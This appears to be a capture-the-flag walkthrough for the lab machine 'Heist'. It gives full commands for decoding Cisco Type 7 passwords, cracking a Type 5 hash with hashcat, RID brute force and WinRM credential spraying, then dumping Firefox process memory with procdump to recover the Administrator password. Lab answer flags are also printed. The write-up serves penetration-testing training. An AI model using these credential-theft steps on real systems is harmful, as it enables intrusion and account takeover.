The Machine
Heist is a Windows machine that does not rely on Active Directory attack paths for privilege escalation. There is no domain controller to DCSync, no BloodHound edges to follow, no Kerberos hashes to roast. The machine teaches two things that appear repeatedly in real engagements: recovering credentials from exposed configuration files, and extracting plaintext secrets from running process memory.
The foothold comes from a support portal on port 80 with guest access. A ticket attachment contains a Cisco router configuration with password hashes. Two are Cisco Type 7, which is not encryption but a reversible XOR encoding. The third is Cisco Type 5, an MD5crypt hash cracked with hashcat mode 500 in under three minutes. The recovered passwords are sprayed against a user list built via RID brute force. One combination grants WinRM access.
Privilege escalation requires no exploit and no group abuse. Firefox is running on the machine as a higher-privileged user. A full process memory dump searched with Select-String surfaces a URL-encoded login request containing the Administrator password in plaintext.
| Port | Service | Notes |
|---|---|---|
80 | HTTP (IIS) | Support login portal. Entry point |
135 | RPC | Standard Windows RPC |
445 | SMB | Signing not required. NTLM relay possible |
5985 | WinRM | Shell delivery once credentials obtained |
Enumeration
Two-phase nmap scan. Wide coverage first, then a targeted service scan on all open ports.
$ nmap -p- --min-rate 1000 -oN heist-all-ports.txt 10.129.20.127
$ ports=$(grep open heist-all-ports.txt | cut -d '/' -f1 | tr '\n' ',' | sed 's/,$//')
$ nmap -p $ports -sC -sV --min-rate 1000 -oN heist-service-scan.txt 10.129.20.127
nmap returns no domain name. Pull the hostname and domain directly from SMB:
$ netexec smb 10.129.20.127SMB 10.129.20.127 445 SUPPORTDESK name: SUPPORTDESK domain: SupportDesk signing: False$ echo "10.129.20.127 supportdesk.htb SupportDesk" | sudo tee -a /etc/hostsSMB signing is False. Note this. If a way to force NTLM authentication appears later, relay to SMB is possible without admin rights.
Web App: Support Portal
The login page offers guest access. Guest view shows open support tickets:
A ticket from hazard contains a Cisco router configuration as an attachment:
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408Three password entries in a publicly accessible support ticket. Cisco Type 7 passwords are not encrypted. They use a reversible XOR cipher with a known key. Cisco Type 5 is MD5crypt, identified by the $1$ prefix, crackable with hashcat mode 500.
Foothold: Cisco Password Recovery
Decoding Type 7 Passwords
Cisco Type 7 encoding uses a fixed 53-character XOR key. The first two digits of the encoded string are the starting offset into the key. This makes it fully reversible with a Python one-liner:
$ python3 -c "
def cisco7(enc):
xlat = 'dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87'
dec = ''
enc = bytes.fromhex(enc)
for i, b in enumerate(enc[1:]):
dec += chr(b ^ ord(xlat[(int(enc[0]) + i) % 53]))
return dec
print('rout3r:', cisco7('0242114B0E143F015F5D1E161713'))
print('admin:', cisco7('02375012182C1A1D751618034F36415408'))
"
rout3r : $uperP@ssword
admin : Q4)sJu\Y8qz*A3?dCracking the Type 5 Hash
$ hashcat -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' /usr/share/wordlists/rockyou.txt --force
$1$pdQG$o8nrSzsGXeaduXrjlvKc91 : stealth1agentThree passwords recovered: stealth1agent, $uperP@ssword, Q4)sJu\Y8qz*A3?d.
User Enumeration via RID Brute Force
The ticket was submitted by hazard. Test hazard:stealth1agent on the web app. It logs in successfully, confirming hazard is a valid Windows account. Use it to enumerate all accounts via RID brute force:
$ netexec smb 10.129.20.127 -u hazard -p 'stealth1agent' --rid-brute
RID brute force with a single low-privilege SMB account enumerates every account on the machine. No admin rights required. Users discovered: Administrator, Guest, Hazard, support, Chase, Jason.
Credential Spray
Build a users list and a passwords list, then spray all combinations over WinRM:
$ netexec winrm 10.129.20.127 -u users.txt -p passwords.txt
WINRM 10.129.20.127 5985 SUPPORTDESK Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)WinRM Shell as Chase
$ evil-winrm -i 10.129.20.127 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
ee9b43457a118ace75a8c905e7d50f55
Privilege Escalation
Group Membership and Process Enumeration
*Evil-WinRM* PS> whoami /groups
Chase has no interesting group memberships. No Server Operators, no backup rights, no AD attack paths. Check running processes:
*Evil-WinRM* PS> Get-Process
Multiple Firefox processes are running. The largest has a working set of 142MB, indicating an active session. Firefox running as a higher-privileged user with an active session is a signal: credentials from that session may be in process memory.
Firefox processes with large working sets indicate an active browser session running under a privileged account. Firefox caches HTTP form submissions including login credentials in process memory. A full memory dump searched for password patterns will surface any recent login submissions in URL-encoded plaintext.
Firefox Process Memory Dump
Download procdump from Sysinternals and upload to the target via evil-winrm:
*Evil-WinRM* PS> upload procdump.exe
*Evil-WinRM* PS> .\procdump.exe -ma 6492 -accepteula
Search the dump for the string password:
*Evil-WinRM* PS> Select-String -Path *.dmp -Pattern "password" -Encoding ascii![Select-String output showing login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ in the memory dump](images/heist/18-admin-username-%26-password.png)
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZFirefox stores recent form submissions in process memory as URL-encoded strings. A GET request to login.php with credentials appended to the URL is cached verbatim. The Administrator password 4dD!5}x/re8]FBuZ is visible in plaintext from the memory dump of PID 6492.
Administrator Shell
$ netexec winrm 10.129.20.127 -u administrator -p '4dD!5}x/re8]FBuZ'![netexec WinRM confirming administrator:4dD!5}x/re8]FBuZ as Pwn3d!](images/heist/20-password-confirmed.png)
$ evil-winrm -i 10.129.20.127 -u administrator -p '4dD!5}x/re8]FBuZ'*Evil-WinRM* PS> type C:\Users\Administrator\Desktop\root.txt
4ef42665db67b4fe686637652ff18d47
Attack Chain
| Step | Technique | Result |
|---|---|---|
| 1 | Nmap two-phase + netexec SMB hostname | SUPPORTDESK / SupportDesk, port 80 HTTP, port 5985 WinRM, SMB signing False |
| 2 | Web app guest access | Support ticket with Cisco router config attachment found |
| 3 | Cisco Type 7 XOR decode (Python) | rout3r:$uperP@ssword and admin:Q4)sJu\Y8qz*A3?d recovered instantly |
| 4 | Hashcat mode 500 (Cisco Type 5) | enable secret cracked: stealth1agent |
| 5 | Web login as hazard | Confirms hazard is a valid Windows domain account |
| 6 | netexec RID brute force | Full user list: Administrator, Hazard, support, Chase, Jason |
| 7 | netexec WinRM credential spray | Chase:Q4)sJu\Y8qz*A3?d hits. Pwn3d! |
| 8 | evil-winrm as Chase | Shell on SUPPORTDESK, user flag captured |
| 9 | Get-Process | Firefox PID 6492, 142MB working set, active privileged session |
| 10 | procdump -ma + Select-String | login_password=4dD!5}x/re8]FBuZ in URL-encoded form data |
| 11 | evil-winrm as Administrator | Root flag captured |
Vulnerabilities Found
| Vulnerability | Location | Impact |
|---|---|---|
| Cisco config exposed in support ticket | Web app guest-accessible ticket | Three credential sets recovered without authentication |
| Cisco Type 7 encoding used for passwords | Cisco config username entries | Instant decode with known XOR key |
| Weak Cisco Type 5 enable secret | Cisco config enable secret | Cracked with rockyou.txt in under 3 minutes |
| Credential reuse across Cisco and Windows | Chase account | WinRM shell via credential spray |
| Firefox running as privileged user | Process list on SUPPORTDESK | Active session with credentials in process memory |
| Plaintext credentials in Firefox process memory | PID 6492 memory dump | Administrator password recovered without any exploit |
Lessons Learned
- When nmap returns no domain name, run
netexec smb <IP>immediately. It returns the machine name, domain, OS version, and SMB signing status in one command. This is faster and more reliable than guessing from nmap output. - Cisco Type 7 passwords are encoded, not encrypted. The XOR cipher uses a fixed 53-character key that has been public for decades. Any Cisco config containing Type 7 password entries is compromised the moment it is exposed. Decode them with a Python one-liner. No cracking required.
- Cisco Type 5 passwords are MD5crypt hashes. The
$1$prefix identifies them. Hashcat mode 500 handles them. They are significantly weaker than modern bcrypt or Argon2 and frequently crack within rockyou. - RID brute forcing enumerates every account with only low-privilege SMB access.
netexec smb --rid-brutecycles through RID numbers and returns every account name. No admin rights needed. This is the fastest way to build a user list on a Windows target without LDAP. - Spray all recovered passwords against all discovered users over WinRM. After every credential recovery, build a users.txt and a passwords.txt and let netexec cover the full matrix. One command replaces manual testing of each combination.
- Running processes are an enumeration target. When whoami /groups shows no privilege and BloodHound has no paths, check
Get-Process. A browser running as a privileged user with a large working set signals an active session. That memory may contain credentials. - Firefox stores recent form POST data in process memory as URL-encoded strings. procdump with
-macaptures the full memory space.Select-String -Pattern "password" -Encoding asciifinds login submissions. The login URL with credentials appended is stored verbatim and readable in plaintext. - Always spray credentials from the memory dump against Administrator first. The account found in Firefox memory was the Administrator account itself. Credential reuse is common. Testing directly against Administrator with netexec before anything else saves time.